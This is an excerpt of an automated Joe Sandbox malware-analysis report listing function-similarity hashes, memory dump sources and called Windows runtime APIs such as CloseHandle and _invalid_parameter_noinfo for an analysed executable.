                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                          • Opcode ID: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
                                                                                                                                                                          • Instruction ID: e8785d5569a0d5e987e2d3e8c9846180f7fd8edcdabe9f4a316d39321060c4a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
                                                                                                                                                                          • Instruction Fuzzy Hash: A5E08650F9B20243FF087BF954D887592509F84750FC64530D80E83272EE2CAA844730
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00007FF7ABC583CD,?,?,00000000,00007FF7ABC58482), ref: 00007FF7ABC585BE
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7ABC583CD,?,?,00000000,00007FF7ABC58482), ref: 00007FF7ABC585C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                          • Opcode ID: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
                                                                                                                                                                          • Instruction ID: 95e2f3160ac3b16b1a7c9bd4c1641c9572370f0e388c7bb2ed09e5f1e07f7aef
                                                                                                                                                                          • Opcode Fuzzy Hash: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
                                                                                                                                                                          • Instruction Fuzzy Hash: 90212E10F4A64251FE90B72C94C067D95816F447E0FC64335EA1E473F2DE6CE5449320
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: dea46c4ca356dce60ce02a55334956757d660a50a99ae36b9b6fb0b255bfd765
                                                                                                                                                                          • Instruction ID: 6a14b49ae032006e8a8a298a09e6cb7531ee4a18615ed5f8ad5f8de4fbcb90d8
                                                                                                                                                                          • Opcode Fuzzy Hash: dea46c4ca356dce60ce02a55334956757d660a50a99ae36b9b6fb0b255bfd765
                                                                                                                                                                          • Instruction Fuzzy Hash: 68A1CD32B15A4189EB10DBA9D0807AC77B1FB88B68F945632DF5D93BA5CF38D590C310
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
                                                                                                                                                                          • Instruction ID: 845740a735de6853fb3648882a78eb247128c0ca6fcca73b5db29a37896108b0
                                                                                                                                                                          • Opcode Fuzzy Hash: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
                                                                                                                                                                          • Instruction Fuzzy Hash: FB610B72A2A64183EA24AB1DD044A7DE3E1FB50B90FC64631EE9D466F5DE7CE481C720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
                                                                                                                                                                          • Instruction ID: 51ae497fb7899abee7a6708423f4312b15a33adcd234f7f1e8a227820f859b91
                                                                                                                                                                          • Opcode Fuzzy Hash: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
                                                                                                                                                                          • Instruction Fuzzy Hash: F5619F73B19B8585EB00DB69E4406AEE7A1FB84B94F918122EE8D17B79DF3CD045CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
                                                                                                                                                                          • Instruction ID: d721e4e3a63af89b90793d4b6a8a3c80c8239a342f901261dd3e1aaf78b6e383
                                                                                                                                                                          • Opcode Fuzzy Hash: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
                                                                                                                                                                          • Instruction Fuzzy Hash: A141E53294A20587EA74AB1CE580A79F3A4EF55B90FD50330DA9E836B1CF6DE403C761
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: 496871d44593103da32b144ae6ab5707e42dc31ee7d76ad2c01cf696424d008c
                                                                                                                                                                          • Instruction ID: 11ca4449e99bc89d65f855223a1b9be4e040e3b88e96e8e50468865aa6f135bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 496871d44593103da32b144ae6ab5707e42dc31ee7d76ad2c01cf696424d008c
                                                                                                                                                                          • Instruction Fuzzy Hash: A231C322A2D78142FA10EB18E45076BE361FBC5790F955231FBDD06ABADF3CD5848B10
                                                                                                                                                                          APIs
                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC668A7
                                                                                                                                                                            • Part of subcall function 00007FF7ABC4CD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7ABC4CD0F,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC4CD69
                                                                                                                                                                            • Part of subcall function 00007FF7ABC4CD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7ABC4CD0F,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC4CD8E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4036615347-0
                                                                                                                                                                          • Opcode ID: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
                                                                                                                                                                          • Instruction ID: 2c4eed88caa53767f8aaa47460ebebaec11a0d730b9c310720e7cb8897439cbb
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
                                                                                                                                                                          • Instruction Fuzzy Hash: EB21F520B0A75242FA25BB694124EB9E290AF4CBD0F966530DE5D47BF5DE3CE8114332
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: 7f2f581e78f95bd5cb904041401751313ae5732a15b65ec4300bfd25b081b8d2
                                                                                                                                                                          • Instruction ID: 03340ca190542d85cc0d3ef54aa70f13376a969df9642c12f53aa89594b48d9c
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f2f581e78f95bd5cb904041401751313ae5732a15b65ec4300bfd25b081b8d2
                                                                                                                                                                          • Instruction Fuzzy Hash: AB313476A06B0982EF159F69E09422C7366EB88F88B958032DE0D4B378DF38D895C350
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                          • Instruction ID: e35d11d590c67928295cb6017cb2ad75918cb536c4491380dfa7c7f72de56cb7
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                          • Instruction Fuzzy Hash: 4831AF21A5A65241E7517F5C8485BBCAA60AF50B90FC70335EA2D033F3DE7CA9418730
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: 8de462020b5dbe9e5686f242d72710926f86c6100d8e301e1f1355b1e0c5bfbc
                                                                                                                                                                          • Instruction ID: 32ddba55350e04d8cdd2948d6cbcc012ac6557e2a6b3587ee36b53302cd10e57
                                                                                                                                                                          • Opcode Fuzzy Hash: 8de462020b5dbe9e5686f242d72710926f86c6100d8e301e1f1355b1e0c5bfbc
                                                                                                                                                                          • Instruction Fuzzy Hash: DC11E1A1B1568581EB04FB28D05977DA352EB41F88FC14032DA4D0B6BADF7EC8C4D390
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF7ABC1F4E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1F5E2
                                                                                                                                                                            • Part of subcall function 00007FF7ABC1F4E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC1F5E8
                                                                                                                                                                            • Part of subcall function 00007FF7ABC491B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC491DB
                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00007FF7ABC28957
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskCpp_errorThrow__invalid_parameter_noinfo_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 88918588-0
                                                                                                                                                                          • Opcode ID: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
                                                                                                                                                                          • Instruction ID: 6f10637a6e7a8ae277bc7fa23cf5d1f72bef9592f9ec4048f02605f927250e17
                                                                                                                                                                          • Opcode Fuzzy Hash: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
                                                                                                                                                                          • Instruction Fuzzy Hash: 9C21923660AB4181E710EF16E445AAAB7A1FBC8BD0F868035EE8D57779DE3CD151C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                          • Opcode ID: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                          • Instruction ID: 6f793286a1498fed3e0004839636033d54ae6537a5f8da632bb36f618819ab4a
                                                                                                                                                                          • Opcode Fuzzy Hash: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
                                                                                                                                                                          • Instruction Fuzzy Hash: A921D132A16B0189EB64AF68C4886EC3BB5EB4431CF850635DB2D06AF5DF3CD681CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 536598887a786ebbff074b2d862031b1db57d1f94f8ba90a96d35c921470b697
                                                                                                                                                                          • Instruction ID: af1b1bc883c26545cf6a9d020e1afe06095141750290ea0cc27ff972741bff4f
                                                                                                                                                                          • Opcode Fuzzy Hash: 536598887a786ebbff074b2d862031b1db57d1f94f8ba90a96d35c921470b697
                                                                                                                                                                          • Instruction Fuzzy Hash: 4421C53270D78286DB61AF2CE480B7AB6A0EB84B94F950334E65D476F9DF3CD5108B10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
                                                                                                                                                                          • Instruction ID: 67efe2ddb172d6b5cbaf05f3dc27a9572e10d629157d9dadad925dd077462aa6
                                                                                                                                                                          • Opcode Fuzzy Hash: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B219532A0978146DB61AF1CD480B7AB6A0EB84B54F954334E66D476F9DF3DD410CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
                                                                                                                                                                          • Instruction ID: 142d6755c0f0bbf2e40c75a07710703593d6b284e3282ac2ec8da9f143d47c48
                                                                                                                                                                          • Opcode Fuzzy Hash: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B11DA21A0E65185EE60BF19D4099B9E261FF95B80F868531EB4D47BB6CFBCDA008730
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: 7337ed8e62dd055f9535e466e8ad91a275852eaa10fcc6b16bd618f4d612e056
                                                                                                                                                                          • Instruction ID: 03b360093a5130d3022186ff81474da0ef46e7b11180c21304d389c9a10b8e52
                                                                                                                                                                          • Opcode Fuzzy Hash: 7337ed8e62dd055f9535e466e8ad91a275852eaa10fcc6b16bd618f4d612e056
                                                                                                                                                                          • Instruction Fuzzy Hash: 5411E521B0964142FA04FB19E25877EA762EF44BC4F955031D70D0BAB6DF7DD5A08350
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
